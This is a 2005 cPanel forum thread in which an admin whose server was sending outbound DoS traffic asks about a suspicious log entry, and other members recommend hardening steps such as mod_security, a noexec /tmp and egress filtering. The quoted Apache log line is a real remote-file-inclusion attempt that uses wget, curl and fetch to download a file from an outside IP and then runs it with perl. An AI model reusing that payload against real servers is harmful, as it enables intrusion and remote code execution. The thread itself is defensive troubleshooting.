The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

I did grep "wget" and got this

Discussion in 'General Discussion' started by Tina, Nov 5, 2005.

  1. Tina

    Tina Well-Known Member

    Joined:
    Jan 27, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    Hi,

    I did grep "wget" /usr/local/apache/domlogs/*

    And I got bunches of these as shown below. Don't know what to make of it. It happened to/from 16 different domains on my server, 2 times each. BTW I don't know who's IP's these are.


    Code:
    
    /usr/local/apache/domlogs/mydomain.com:211.38.128.10 - - [01/Nov/2005:13:51:24 -0600] "GET  
    /webcalendar/tools/send_reminders.php?includedir=http://82.165.228.69/images/fbi.gif?
    &cmd=cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1" 404 - "-"
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    
    
    In the meantime i did chmod 700 wget as suggested by chirpy and I updated php (Jackie) and installed apf and did everything else I could find in these forums...

    The reason, outbound udp DOS attacks from my server. I still don't know where the vulnerability is or if I have done enough to secure my server...

    It's been a long two days for this newbie :(

    TIA,

    Tina
     
    #1 Tina, Nov 5, 2005
    Last edited: Nov 5, 2005
  2. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Try setting up mod_security (there's plenty of threads on how to do it around here).
     
  3. Tina

    Tina Well-Known Member

    Joined:
    Jan 27, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    It's done. Thank you. Anything else I can do?
     
  4. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    There's quite a few good threads around here with instructions for securing your server, if you follow their recommendations you should be ok.
     
  5. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Twitter:
  6. Tina

    Tina Well-Known Member

    Joined:
    Jan 27, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    Yes. I went through all the guides, implemented almost all the suggestions. How do I know that I am ok now? How do I know if I fixed what was broken when I don't know what was broken. It's all a mystery really. Here's what I did.

    installed or upgraded or compiled:

    mod_security
    php 4.4.1
    chkrootkit (cron job 3 times a day - a bit much I see but I am learning)
    rkhunter
    ssh login to different port, ip and protocol 2
    ssh root login disabled
    apf with antidos
    bfd
    log watch (10)
    mail :fail:
    chmod 700 wget
    telnet disabled
    mysql password changed different from root
    some whm config changes

    What I don't understand yet is whether or not I should do anything with the /tmp directory and phpsuexec.

    And I need to upgrade my os.

    So am I ok? Is this enough? I have 2 more boxes to work on after I finish this one. :rolleyes:

    T.
     
  7. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Twitter:
    Really, you should do something with your /tmp as well, yes. There is a tutorial on that site for mounting /tmpwith permissions to help prevent files from being run inside the /tmp directory. It's not 100% effective anymore, but will stop most of the 'scripts' from getting going.
    Also note that wget is just one method used to download files to the server.
    http://www.eth0.us/node/6
    http://www.eth0.us/obscurity
    http://www.eth0.us/php

    Also, while it's a bit on the technical side, you might want to also check your Kernel version, and if it's outdated, look into compiling an updated and more secured version.

    In your APF, you have egress filtering enabled, yes?
     
Loading...

Share This Page